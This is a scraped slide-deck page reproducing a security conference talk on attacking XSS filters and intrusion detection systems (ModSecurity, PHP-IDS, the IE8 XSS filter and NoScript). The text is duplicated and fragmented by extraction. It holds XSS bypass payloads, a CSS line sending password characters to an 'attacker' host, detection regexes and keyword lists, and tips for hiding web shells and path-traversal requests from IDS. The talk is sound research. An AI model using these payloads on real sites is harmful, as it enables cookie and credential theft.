Что такое findslide.org?

FindSlide.org - это сайт презентаций, докладов, шаблонов в формате PowerPoint.


Для правообладателей

Обратная связь

Email: Нажмите что бы посмотреть 

Яндекс.Метрика

Презентация на тему Our Favorite XSS Filters/IDS and how to Attack Them

Содержание

About Us
Our Favorite XSS Filters/IDS and how to Attack ThemMost recent version of About Us About UsEduardo Vela (sirdarckcat)http://sirdarckcat.net/http://sirdarckcat.blogspot.com/https://twitter.com/sirdarckcatMoved from .mx to .cn in Spring '09 Definitely About UsDavid Lindsayhttp://p42.us/http://www.cigital.com/https://twitter.com/thornmakerDefinitely does work for Cigital and recently moved to Virginia The Basicsmilk before meat? XSS BasicsAttacker controls dynamic content in HTTP response, e.g. HTML, CSS, JavaScript, etcClassic examples:alert(0)">">"> The Cheat Sheet – http://ha.ckers.org/xss.html - Robert Filter BasicsDangerous?yesnoUNTRUSTEDAPPLICATION Sits between browser and the server (or at one of the endpoints).Filter BasicsBrowser   Servermod_securityPHP-IDSImperva We're not looking at sanitization methods/functions. We wont make any distinction between Evasion Techniqueshope you liked the milk No white space, can use / or nothing at all after quoted attributesHTML Tricks Round about way to assign the src paramaterAvoids Few know of isindex tagKudos to Gareth Heyes for theseHTML Tricks src = this.src, alt = this.altHTML Tricks alert('xss');Content served as text/xml and text/xml-xhtml can execute JavaScript by using html location='javascript:alert(0)';location=name; Short, no parenthesis for secondVictim is not actually redirected anywhere so location=location.hash.slice(1); //avoid the #location=location.hash  //FF onlyPayload comes after hash in URLVictim alert(document.cookie)alert(document['cookie'])with(document)alert(cookie)These are all equivalentJavaScript Tricks eval(document.referrer.slice(10));When attacker controls referrer pageeval(0+location.string)  //or 1+location.stringUse a ternary operator along x setter=eval,x=1Execute arbitrary code without quotes or parenthesisFF onlyThis notation has been deprecated for years...JavaScript Tricks http://site.com/?p= (É=[Å=[],µ=!Å+Å][µ[È=-~-~++Å]+({}+Å) [Ç=!!Å+µ,ª=Ç[Å]+Ç[+!Å],Å]+ª])() [µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)what, you don't see the alert(1) in there?no alphanumeric characters, testIE onlyvbscript in event handlersVBScript Tricks eval+namejust like eval(name) in JavaScriptVBScript Tricks HTML5 will allow attributes in closing tagsFuture Tricks? input[name=password][value*=a]{ background:url('//attacker?log[]=a');}HTML5 includes data:text/html,alert(0)data:text/html;base64, PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==supported by all modern browsers except IE (congrats to IE team )Other Tricks ?injection=alert(1)>HPP - HTTP Paramater PollutionVariations of this can bypass most filters (not var m=link // XML inside JSXML inside JavaScript{alert('xss')}JavaScript inside XML evaluated as JavaScriptOther Tricks Unicode and XSSOnly Mozilla’s 5 thousand lines of code implementation appears to be safe (maybe). Java’s Modified UnicodeUnicode.... 1.0…..   2.0……   3.0...3.1…..  4.0……  5.0….Modified Unicode Unicode Quick Intro0xxx xxxx -> ASCII1xxx xxxx -> Unicode110x xxxx 10xx xxxx Overlong UTFWays to represent the “less than” char PHPunsigned short c;// 16 bits... if (c >= 0xf0) { /* four Eating charsö == \x90 (also works with other chars, but we want Introducing The FiltersPHP-IDSMod_SecurityIE8NoScript ModSecurityhttp://modsecurity.org/ Open Sourceeasy to install Apache moduleModSecurity Advantages filters are ineffectiveInfrequently updatedNo support for different encodings ModSecurity Disadvantages Most of the XSS filtering occurs in just one filterFirst phase – Second phase – must match this regular expression:(?:\b(?:(?:type\b\W*?\b(?:text\b\W*?\b(?:j(?:ava)?|ecma|vb)|application\b\W*?\bx-(?:java|vb))script|c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder|iframe\b.{0,100}?\bsrc)\b|on(?:(?:mo(?:use(?:o(?:ver|ut)|down|move|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)\b\W*?=|abort\b)|(?:l(?:owsrc\b\W*?\b(?:(?:java|vb)script|shell|http)|ivescript)|(?:href|url)\b\W*?\b(?:(?:java|vb)script|shell)|background-image|mocha):|s(?:(?:tyle\b\W*=.*\bexpression\b\W*|ettimeout\b\W*?)\(|rc\b\W*?\b(?:(?:java|vb)script|shell|http):)|a(?:ctivexobject\b|lert\b\W*?\(|sfunction:))| The filter will catch:but miss:andandModSecurity The filter will catch: Good for novices to practice againstOther types of filters (SQLi, Response Splitting, http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_ProjectWould be a good place to start, except:ModSecurity PHP-IDShttp://php-ids.org/ Attempts to detect all attacks (not just common attacks). Easily catches all Sometimes false positives PHP-dependant ( Developed by Mario Heiderich along with Christian Matthies and Lars H. StrojnyAggressive (?:,\s*(?:alert|showmodaldialog|eval)\s*,)|(?::\s*eval\s*[^\s])|([^:\s\w,.\/?+-]\s*)?(?Filter ExamplesFilters are very targetedHas 68 filters in addition to the one PHP-IDS Developing a Bypasseval(name)Injection Found! Overall Impact: 17 PHP-IDS Developing a Bypassx=evaly=namex(y)Injection Found! Overall Impact: 12 PHP-IDS Developing a Bypassx='ev'+'al'x=this[x]y='na'+'me'x(x(y))Injection Found! Overall Impact: 46 PHP-IDS Developing a Bypass$$='e'x='ev'+'al'x=this[x]y='nam'+$$y=x(y)x(y)Injection Found! Overall Impact: 37 PHP-IDS Developing a Bypass$$='e'x=$$+'val'z=(1)['__par'+'ent__']x=z[x]y=x('nam'+e)x(y)Injection Found! Overall Impact: 62 PHP-IDS Developing a Bypass$$='e'__='__par'x=$$+'val'z=(1)[__+'ent__']x=z[x]y=x('nam'+e)x(y)Injection Found! Overall Impact: 27 PHP-IDS Developing a Bypass$$='e'__='__par'x=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=z[x]y=x('nam'+e)x(y)Injection Found! Overall Impact: 18 PHP-IDS Developing a Bypass__=''$$=__+'e'__=__+'__par'x=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=z[x]y=x('nam'+e)x(y)Injection Found! Overall Impact: 14 PHP-IDS Developing a Bypass__=''$$=__+'e'__=__+'__par'_=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=x[_]y=x('nam'+$$)x(y)Injection Found! Overall Impact: 07 PHP-IDS Developing a Bypass__=''$$=__+'e'__=__+'__par'_=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=x[_]y=x('nam'+$$)x(y)'abc(def)ghi(jkl)mno(pqr)abc(def)ghi 'Injection Found! Overall Impact: 07 PHP-IDS Developing a Bypass__=''$$=__+'e'__=__+'__par'_=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=x[_]y=x('nam'+$$)x(y) 'abc(def)ghi(jkl)mno(pqr)abc(def)abc(def)...'Nothing suspicious was found! PHP-IDS Developing a Bypasshttp://p42.us/phpids/95.htmlThis injection worked on 24.July.2009Will be fixed shortly (used with Mario's permission) Other Recent bypasses:testCourtesy of Gareth Heyesthis[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+name,new Array)Courtesy of David LindsayPHP-IDS -setTimeout(  1E1+  ',aler\  t ( /Mario dont go, its XSS Filterhttp://blogs.technet.com/srd/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspxhttp://blogs.msdn.com/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspxExamining the IE8 XSS Filter by kuza55 (OWASP Australia) It should be compatible.It should be secure.  It should be performant.The 3           If its not compatible, users will turn it off.If its not performant, HTTP/1.0 200 OK Cache-Control: private, max-age=0 Date: Sun, 11 Jul 2010 The filter will protect against the Top 3 Reflected XSS vectors:   The rulesIf you want to see them:C:\>findstr /C: Request?var= Rule matched:{} Response Source Code Final Source CodeThe rules We will show the remaining 7 of our..Top 10 reflected XSS attacks Fragmented ?url='%20x=`&name=`%20onmouseover='alert(1)   DOM based /index.php/alert(1)/ document.write( Reflected XSS means that the matched attack has to be present in Attacks that are made to content not loaded as HTML Attack in Using CSS-only attacksinput[type=password][value^=a]{background: Intranet  Same OriginOther Exceptions Allowed by the filter:clickmeSo this wont be detected (clickjacking):linkDemohttp://search.cnn.com/search?query=aaa&currentPage=2&nt=%22%3E%3Ca%20href%3D%22%3Fquery%3Daaa%26currentPage%3D2%26nt%3D%2522%253E%253C%2573crip%2574%253E%2561lert%2528%2527Props%2520To%2520The%2520Rat%2527%2529%253C/%2573crip%2574%253E%22%3E%3Cimg%20style%3D%22cursor%3Aarrow%3Bheight%3A200%25%3Bwidth%3A200%25%3Bposition%3Aabsolute%3Btop%3A-10px%3Bleft%3A-10px%3Bbackground-image%3Atransparent%22%20border%3D0/%3E%3C/a%3EProps to cesar cerrudo CRLF Injection:header(“Location: ”.$_GET[‘redir’]);redir=“\nX-XSS-Protection:+0\n\n IE8 Blocks JS by disabling:=()BUT It is possible to execute code without Other possible bypasses?Require a certain context. new voteForObama; // executes any user-function without Disabling scriptsOriginal code:if(top!=self)top.location=locationRequest:?foobar=ifAfter filter:if(top!=self)top.location=locationDemo! With.. Any webpageAttacking with the XSS Filter Attacking content-aware filtersOriginal code: 	continueURI=“/login2.jsp?friend=”; Request:?foobar=continueURIAfter filter: 	continueURI=“/login2.jsp?friend=”; Attacking with the XSS Filter Why don't you detect fragmented attacks? Performance, the amount of permutations of Why don't you detect attacks to Intranet? The Intranet zone pretty much Firefox -> Never! They have CSP and they think that's all they NoScripthttp://noscript.net/ NoScript AdvantagesTheir users.Security over usability (still very usable!).Updates every week/2 weeks.Is NOT just a XSS filter. As any other filter, it's still possible to bypass NoScript's rules, the find a bypass 10 minutes before the talk!if I can't.. then.. it The DoS and pwn on NoScript (for bypassing) The following example: http://victim.com/xss.php?hello=a-very-long-and-complicated-js-string&html_xss=alert ( NoScript wont protect websites from attacking themselves, so frames pointing to a Tribute to the stupid IDSThanks to pretty much every other WAF vendor out there... Follow this simple rules and a lot of IDS wont detect your Stop using alert('xss').You should now use prompt('xss').Rule Number 1 Dont do .Do For blind SQL injections.Stop using ' or 1=1--.Use ' or 2=2--.Rule Number 3 For SQL injections.Stop using UNION SELECT.Use UNION ALL SELECT.Rule Number 4 Don’t do /etc/passwd.Do /foo/../etc/bar/../passwd.Rule Number 5 Don’t use http://yourhost.com/r57.txtUse https://yourhost.com/lol.txtRule Number 6 Don’t call your webshell c99.php, shell.aspx or cmd.jspCall it rofl.php.Rule Number 7 For Internet Explorer, use IE-8, and enable the XSS Filter If you Thanks goes to many for helping us with this presentation including:all the Q + AGet slides from blackhat’s website or from: http://p42.us/favxss/
Слайды презентации

Слайд 2 About Us

About Us

Слайд 3 About Us
Eduardo Vela (sirdarckcat)

http://sirdarckcat.net/
http://sirdarckcat.blogspot.com/
https://twitter.com/sirdarckcat

Moved from .mx to .cn

About UsEduardo Vela (sirdarckcat)http://sirdarckcat.net/http://sirdarckcat.blogspot.com/https://twitter.com/sirdarckcatMoved from .mx to .cn in Spring '09

in Spring '09

Definitely does not work for YU

WAN MEI http://www.yuwanmei.com/
Working doing sec R&D


Слайд 4 About Us
David Lindsay

http://p42.us/
http://www.cigital.com/
https://twitter.com/thornmaker

Definitely does work for Cigital and

About UsDavid Lindsayhttp://p42.us/http://www.cigital.com/https://twitter.com/thornmakerDefinitely does work for Cigital and recently moved to

recently moved to Virginia so that his vote might

actually mean something (as opposed to when he lived in Massachusetts and Utah)


Слайд 5 The Basics
milk before meat?

The Basicsmilk before meat?

Слайд 6 XSS Basics
Attacker controls dynamic content in HTTP response,

e.g. HTML, CSS, JavaScript, etc

Classic examples:
">alert(0)
">
">


Слайд 7 The Cheat Sheet – http://ha.ckers.org/xss.html - Robert "RSnake"

The Cheat Sheet – http://ha.ckers.org/xss.html - Robert

Hansen
WASC Script Mapping Project - http://projects.webappsec.org/f/ScriptMapping_Release_26Nov2007.html - Romain Gaucher
Obligatory

(but still useful) OWASP reference - http://www.owasp.org/index.php/Cross-Site_Scripting
tra.ckers.org ? any day now... bug rsnake and id :)

XSS Basics – Helpful Resources


Слайд 8 Filter Basics
Dangerous?
yes
no
UNTRUSTED
APPLICATION

Filter BasicsDangerous?yesnoUNTRUSTEDAPPLICATION

Слайд 9 Sits between browser and the server (or at

Sits between browser and the server (or at one of the endpoints).Filter BasicsBrowser  Servermod_securityPHP-IDSImperva

one of the endpoints).
Filter Basics
Browser
Server
mod_security
PHP-IDS
Imperva


Слайд 10 We're not looking at sanitization methods/functions.
We wont make

We're not looking at sanitization methods/functions. We wont make any distinction

any distinction between blocking and detection mode.

If attack focused,

must cover all variations.

If vulnerability focused, must cover all variations.

Our Approach


Слайд 11 Evasion Techniques
hope you liked the milk

Evasion Techniqueshope you liked the milk

Слайд 12

No white space, can use / or nothing

No white space, can use / or nothing at all after quoted attributesHTML Tricks

at all after quoted attributes

HTML Tricks


Слайд 13

Round about way to assign

Round about way to assign the src paramaterAvoids

the src paramater



Avoids "src" altogether
Kudos to Alex K.

(kuza55) for these


HTML Tricks


Слайд 14



Few know of

Few know of isindex tagKudos to Gareth Heyes for theseHTML Tricks

isindex tag
Kudos to Gareth Heyes for these


HTML Tricks


Слайд 15

src = this.src, alt =

src = this.src, alt = this.altHTML Tricks

this.alt




HTML Tricks


Слайд 16 alert('xss');

Content served as text/xml and text/xml-xhtml can

alert('xss');Content served as text/xml and text/xml-xhtml can execute JavaScript by using

execute JavaScript by using html and xhtml namespaces






XHTML Tricks



Слайд 17 location='javascript:alert(0)';

location=name;

Short, no parenthesis for second
Victim is not

location='javascript:alert(0)';location=name; Short, no parenthesis for secondVictim is not actually redirected anywhere

actually redirected anywhere so it can be transparent
name =

window.name
Downside: attacker controlled website must be involved
Downside: persistent XSS is demoted to reflective XSS

JavaScript Tricks


Слайд 18 location=location.hash.slice(1); //avoid the #

location=location.hash //FF only

Payload comes

location=location.hash.slice(1); //avoid the #location=location.hash //FF onlyPayload comes after hash in URLVictim

after hash in URL
Victim website does not see true

payload
No parenthesis in second one
In FireFox, you can incorporate the hash symbol as a sharp variable, #0={}
http://victim.com/?param=";location=location.hash)//#0={};alert(0)

JavaScript Tricks


Слайд 19 alert(document.cookie)
alert(document['cookie'])
with(document)alert(cookie)

These are all equivalent

JavaScript Tricks

alert(document.cookie)alert(document['cookie'])with(document)alert(cookie)These are all equivalentJavaScript Tricks

Слайд 20 eval(document.referrer.slice(10));

When attacker controls referrer page

eval(0+location.string) //or 1+location.string

Use

eval(document.referrer.slice(10));When attacker controls referrer pageeval(0+location.string) //or 1+location.stringUse a ternary operator along

a ternary operator along with fake GET paramaters, e.g.
0?fake1=1/*&id=42&name=";eval(1+location.string);"&lang=EN&fake2=*/:alert(0)



JavaScript

Tricks

Слайд 21 x setter=eval,x=1

Execute arbitrary code without quotes or parenthesis
FF

x setter=eval,x=1Execute arbitrary code without quotes or parenthesisFF onlyThis notation has been deprecated for years...JavaScript Tricks

only
This notation has been deprecated for years...

JavaScript Tricks


Слайд 22
http://site.com/?p=";eval(unescape(location))//# %0Aalert(0)

http: JavaScript label
// single line comment
%0A newline, needs to be

http://site.com/?p=

unescaped
JavaScript Tricks


Слайд 23 ""+{toString:alert}

""+{valueOf:alert}


Executes function without using () or =
Works

in IE and Opera
This shouldn't work...

JavaScript Tricks


Слайд 24 (É=[Å=[],µ=!Å+Å][µ[È=-~-~++Å]+({}+Å) [Ç=!!Å+µ,ª=Ç[Å]+Ç[+!Å],Å]+ª])() [µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)

($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''
+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)

what, you don't see the alert(1)

(É=[Å=[],µ=!Å+Å][µ[È=-~-~++Å]+({}+Å) [Ç=!!Å+µ,ª=Ç[Å]+Ç[+!Å],Å]+ª])() [µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)what, you don't see the alert(1) in there?no alphanumeric

in there?
no alphanumeric characters, can execute arbitrary JavaScript
kudos to

Yosuke Hasegawa

JavaScript Tricks


Слайд 25 test

IE only
vbscript in event handlers

VBScript Tricks

testIE onlyvbscript in event handlersVBScript Tricks

Слайд 26 eval+name

just like eval(name) in JavaScript

VBScript Tricks

eval+namejust like eval(name) in JavaScriptVBScript Tricks

Слайд 27

HTML5 will allow attributes in closing tags

Future

HTML5 will allow attributes in closing tagsFuture Tricks?

Tricks?


Слайд 28 input[name=password][value*=a]{
background:url('//attacker?log[]=a');
}


HTML5 includes "seamless" iframes
could allow

input[name=password][value*=a]{ background:url('//attacker?log[]=a');}HTML5 includes

for pure css-based XSS attacks

Future Tricks?


Слайд 29 data:text/html,alert(0)

data:text/html;base64, PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==

supported by all modern browsers except IE

data:text/html,alert(0)data:text/html;base64, PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==supported by all modern browsers except IE (congrats to IE team )Other Tricks

(congrats to IE team )

Other Tricks


Слайд 30 ?injection=alert(1)>

HPP - HTTP Paramater Pollution
Variations of this can

?injection=alert(1)>HPP - HTTP Paramater PollutionVariations of this can bypass most filters

bypass most filters (not IE8)
Underlying server/application must join parameters

somehow (ASP, ASP.NET on IIS)
Stefano di Paola and Luca Carettoni recently presented on HPP at OWASP EU09 - paper at http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf

Other Tricks


Слайд 31 var m=link
// XML inside JS

XML inside

var m=link // XML inside JSXML inside JavaScript{alert('xss')}JavaScript inside XML evaluated as JavaScriptOther Tricks

JavaScript

{alert('xss')}

JavaScript inside XML evaluated as JavaScript
Other Tricks


Слайд 32 Unicode and XSS
Only Mozilla’s 5 thousand lines of

Unicode and XSSOnly Mozilla’s 5 thousand lines of code implementation appears to be safe (maybe).

code implementation appears to be safe (maybe).


Слайд 33 Java’s Modified Unicode
Unicode.... 1.0….. 2.0……

Java’s Modified UnicodeUnicode.... 1.0…..  2.0……  3.0...3.1….. 4.0…… 5.0….Modified Unicode

3.0...3.1….. 4.0…… 5.0….
Modified Unicode


Слайд 34 Unicode Quick Intro
0xxx xxxx -> ASCII
1xxx xxxx ->

Unicode Quick Intro0xxx xxxx -> ASCII1xxx xxxx -> Unicode110x xxxx 10xx

Unicode
110x xxxx 10xx xxxx -> 11 bits char (2

bytes)
1110 xxxx 10xx xxxx  10xx xxxx -> 16 bits char (3 bytes)
1111 0xxx 10xx xxxx 10xx xxxx 10xx xxxx -> 21 bits char
Etc..



Слайд 35 Overlong UTF
Ways to represent the “less than” char

Overlong UTFWays to represent the “less than” char

exploit:
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE


Слайд 36 PHP
unsigned short c;// 16 bits
... if (c >= 0xf0)

PHPunsigned short c;// 16 bits... if (c >= 0xf0) { /*

{ /* four bytes encoded, 21 bits */       

 c = ((s[0]&7)<<18) | ((s[1]&63)<<12) | ((s[2]&63)<<6) | (s[3]&63);         s += 4;         pos -= 4;

“c” is overflowed

Eg: %FF%F0%80%BC
1111 1111 1111 0000 1000 0000 1010 1100


Слайд 37 Eating chars

ö == \x90 (also works

Eating charsö == \x90 (also works with other chars, but we

with other chars, but we want to use NOP)

PHP’s

utf8_decode will transform it to:


Tip: this also works on all M$ products (IE).. Still thinking your filter is safe?


Слайд 38 Introducing The Filters
PHP-IDS
Mod_Security
IE8
NoScript

Introducing The FiltersPHP-IDSMod_SecurityIE8NoScript

Слайд 39 ModSecurity
http://modsecurity.org/

ModSecurityhttp://modsecurity.org/

Слайд 40 Open Source

easy to install Apache module






ModSecurity Advantages

Open Sourceeasy to install Apache moduleModSecurity Advantages

Слайд 41 filters are ineffective

Infrequently updated

No support for different encodings

filters are ineffectiveInfrequently updatedNo support for different encodings ModSecurity Disadvantages








ModSecurity Disadvantages


Слайд 42 Most of the XSS filtering occurs in just

Most of the XSS filtering occurs in just one filterFirst phase

one filter

First phase – must match one of these

keywords:

@pm jscript onsubmit copyparentfolder javascript meta onmove onkeydown
onchange onkeyup activexobject expression onmouseup ecmascript onmouseover vbsc
ript: s asfunction: onclick .fromcharcode background-image: .cookie ondragdrop onblur
x-javascript mocha: onfocus javascript: getparentfolder lowsrc onresize @import
alert onselect script onmouseout onmousemove background application .execscript
livescript: getspecialfolder vbscript iframe .addimport onunload createtextrange
onload

ModSecurity Filters


Слайд 43 Second phase – must match this regular expression:

(?:\b(?:(?:type\b\W*?\b(?:text\b\W*?\b
(?:j(?:ava)?|ecma|vb)|application\b\W*?\bx-(?:java|vb))script|c(?:opyparentfolde
r|reatetextrange)|get(?:special|parent)folder|iframe\b.{0,100}?\bsrc)\b|on(?:(?:
mo(?:use(?:o(?:ver|ut)|down|move|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(
?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)\b\W*?=|abort\b)|(?:l(?:ows
rc\b\W*?\b(?:(?:java|vb)script|shell|http)|ivescript)|(?:href|url)\b\W*?\b(?:(?:
java|vb)script|shell)|background-image|mocha):|s(?:(?:tyle\b\W*=.*\bexpression\b
\W*|ettimeout\b\W*?)\(|rc\b\W*?\b(?:(?:java|vb)script|shell|http):)|a(?:ctivexob
ject\b|lert\b\W*?\(|sfunction:))|

Second phase – must match this regular expression:(?:\b(?:(?:type\b\W*?\b(?:text\b\W*?\b(?:j(?:ava)?|ecma|vb)|application\b\W*?\bx-(?:java|vb))script|c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder|iframe\b.{0,100}?\bsrc)\b|on(?:(?:mo(?:use(?:o(?:ver|ut)|down|move|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)\b\W*?=|abort\b)|(?:l(?:owsrc\b\W*?\b(?:(?:java|vb)script|shell|http)|ivescript)|(?:href|url)\b\W*?\b(?:(?:java|vb)script|shell)|background-image|mocha):|s(?:(?:tyle\b\W*=.*\bexpression\b\W*|ettimeout\b\W*?)\(|rc\b\W*?\b(?:(?:java|vb)script|shell|http):)|a(?:ctivexobject\b|lert\b\W*?\(|sfunction:))|

?(?:(?:script|meta)\b|iframe)|!\[cdata\[)|(?:\.(?:(?:e
xecscrip|addimpor)t|(?:fromcharcod|cooki)e|innerhtml)|\@import)\b)

ModSecurity Filters


Слайд 44 The filter will catch:



but miss:

The filter will catch:but miss:andandModSecurity

onerror="eval(src%2b'(0)')">
and

and







ModSecurity


Слайд 45 The filter will catch:

";document.write('');"

but miss:

";document.write('');"





ModSecurity

The filter will catch:

Слайд 46
Good for novices to practice against

Other types of

Good for novices to practice againstOther types of filters (SQLi, Response

filters (SQLi, Response Splitting, etc) are just as bad

Has

potential... if filters are strengthened



ModSecurity


Слайд 47 http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project

Would be a good place to start, except:


ModSecurity

http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_ProjectWould be a good place to start, except:ModSecurity

Слайд 48 PHP-IDS
http://php-ids.org/

PHP-IDShttp://php-ids.org/

Слайд 49 Attempts to detect all attacks (not just common

Attempts to detect all attacks (not just common attacks). Easily catches

attacks).

Easily catches all basic injections

Open source - a

lot of people "hack it" in their "free time"

Well maintained - rule-sets are frequently attacked and improved

Codebase supports a lot of encoding algorithms

PHP-IDS Advantages


Слайд 50 Sometimes false positives

PHP-dependant ("ported" to typo3, Drupal,

Sometimes false positives PHP-dependant (

perl)

CPU consumption
PHP-IDS Disadvantages


Слайд 51 Developed by Mario Heiderich along with Christian Matthies

Developed by Mario Heiderich along with Christian Matthies and Lars H.

and Lars H. Strojny

Aggressive blacklist filtering
detects all forms of

XSS imaginable (and more)

Each injection is given a score based upon the number of filters triggered

Filters have greatly improved over past 2 years thanks to demo.phpids.org, sla.ckers, and Mario who frequently updates

PHP-IDS


Слайд 52 (?:,\s*(?:alert|showmodaldialog|eval)\s*,)|(?::\s*eval\s*[^\s])|([^:\s\w,.\/?+-]\s*)?(?Filter Examples
Filters are very targeted
Has 68 filters in

(?:,\s*(?:alert|showmodaldialog|eval)\s*,)|(?::\s*eval\s*[^\s])|([^:\s\w,.\/?+-]\s*)?(?Filter ExamplesFilters are very targetedHas 68 filters in addition to the

addition to the one below (majority are for XSS,

not all)

https://svn.phpids.org/svn/trunk/lib/IDS/default_filter.xml

Слайд 53 PHP-IDS Developing a Bypass
eval(name)


Injection Found! Overall Impact: 17



PHP-IDS Developing a Bypasseval(name)Injection Found! Overall Impact: 17

Слайд 54 PHP-IDS Developing a Bypass
x=eval
y=name
x(y)

Injection Found! Overall Impact: 12



PHP-IDS Developing a Bypassx=evaly=namex(y)Injection Found! Overall Impact: 12

Слайд 55 PHP-IDS Developing a Bypass
x='ev'+'al'
x=this[x]
y='na'+'me'
x(x(y))

Injection Found! Overall Impact: 46



PHP-IDS Developing a Bypassx='ev'+'al'x=this[x]y='na'+'me'x(x(y))Injection Found! Overall Impact: 46

Слайд 56 PHP-IDS Developing a Bypass
$$='e'
x='ev'+'al'
x=this[x]
y='nam'+$$
y=x(y)
x(y)

Injection Found! Overall Impact: 37



PHP-IDS Developing a Bypass$$='e'x='ev'+'al'x=this[x]y='nam'+$$y=x(y)x(y)Injection Found! Overall Impact: 37

Слайд 57 PHP-IDS Developing a Bypass
$$='e'
x=$$+'val'
z=(1)['__par'+'ent__']
x=z[x]
y=x('nam'+e)
x(y)

Injection Found! Overall Impact: 62

PHP-IDS Developing a Bypass$$='e'x=$$+'val'z=(1)['__par'+'ent__']x=z[x]y=x('nam'+e)x(y)Injection Found! Overall Impact: 62

Слайд 58 PHP-IDS Developing a Bypass
$$='e'
__='__par'
x=$$+'val'
z=(1)[__+'ent__']
x=z[x]
y=x('nam'+e)
x(y)

Injection Found! Overall Impact: 27

PHP-IDS Developing a Bypass$$='e'__='__par'x=$$+'val'z=(1)[__+'ent__']x=z[x]y=x('nam'+e)x(y)Injection Found! Overall Impact: 27

Слайд 59 PHP-IDS Developing a Bypass
$$='e'
__='__par'
x=$$+'val'
x=1+[]
z=$$+'nt__'
x=x[__+z]
x=z[x]
y=x('nam'+e)
x(y)

Injection Found! Overall Impact: 18

PHP-IDS Developing a Bypass$$='e'__='__par'x=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=z[x]y=x('nam'+e)x(y)Injection Found! Overall Impact: 18

Слайд 60 PHP-IDS Developing a Bypass
__=''
$$=__+'e'
__=__+'__par'
x=$$+'val'
x=1+[]
z=$$+'nt__'
x=x[__+z]
x=z[x]
y=x('nam'+e)
x(y)

Injection Found! Overall Impact: 14

PHP-IDS Developing a Bypass__=''$$=__+'e'__=__+'__par'x=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=z[x]y=x('nam'+e)x(y)Injection Found! Overall Impact: 14

Слайд 61 PHP-IDS Developing a Bypass
__=''
$$=__+'e'
__=__+'__par'
_=$$+'val'
x=1+[]
z=$$+'nt__'
x=x[__+z]
x=x[_]
y=x('nam'+$$)
x(y)

Injection Found! Overall Impact: 07

PHP-IDS Developing a Bypass__=''$$=__+'e'__=__+'__par'_=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=x[_]y=x('nam'+$$)x(y)Injection Found! Overall Impact: 07

Слайд 62 PHP-IDS Developing a Bypass
__=''
$$=__+'e'
__=__+'__par'
_=$$+'val'
x=1+[]
z=$$+'nt__'
x=x[__+z]
x=x[_]
y=x('nam'+$$)
x(y)
'abc(def)ghi(jkl)mno(pqr)abc(def)ghi '

Injection Found! Overall Impact:

PHP-IDS Developing a Bypass__=''$$=__+'e'__=__+'__par'_=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=x[_]y=x('nam'+$$)x(y)'abc(def)ghi(jkl)mno(pqr)abc(def)ghi 'Injection Found! Overall Impact: 07

Слайд 63 PHP-IDS Developing a Bypass
__=''
$$=__+'e'
__=__+'__par'
_=$$+'val'
x=1+[]
z=$$+'nt__'
x=x[__+z]
x=x[_]
y=x('nam'+$$)
x(y) 'abc(def)ghi(jkl)mno(pqr)abc(def)abc(def)...'

Nothing suspicious was found!

PHP-IDS Developing a Bypass__=''$$=__+'e'__=__+'__par'_=$$+'val'x=1+[]z=$$+'nt__'x=x[__+z]x=x[_]y=x('nam'+$$)x(y) 'abc(def)ghi(jkl)mno(pqr)abc(def)abc(def)...'Nothing suspicious was found!

Слайд 64 PHP-IDS Developing a Bypass
http://p42.us/phpids/95.html
This injection worked on 24.July.2009

Will

PHP-IDS Developing a Bypasshttp://p42.us/phpids/95.htmlThis injection worked on 24.July.2009Will be fixed shortly (used with Mario's permission)

be fixed shortly (used with Mario's permission)


Слайд 65 Other Recent bypasses:

test

Courtesy of Gareth Heyes

this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+name,new

Other Recent bypasses:testCourtesy of Gareth Heyesthis[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+name,new Array)Courtesy of David LindsayPHP-IDS

Array)

Courtesy of David Lindsay
PHP-IDS


Слайд 66 -setTimeout( 1E1+ ',aler\ t ( /Mario dont go,

-setTimeout( 1E1+ ',aler\ t ( /Mario dont go, its fun phpids

its fun phpids rocks/ ) + 1E100000 ' )

Courtesy

of Gareth Heyes (maybe he's a terminator like XSS machine?)

alert(1)">hola

Courtesy of Eduardo Vela

PHP-IDS


Слайд 67 XSS Filter
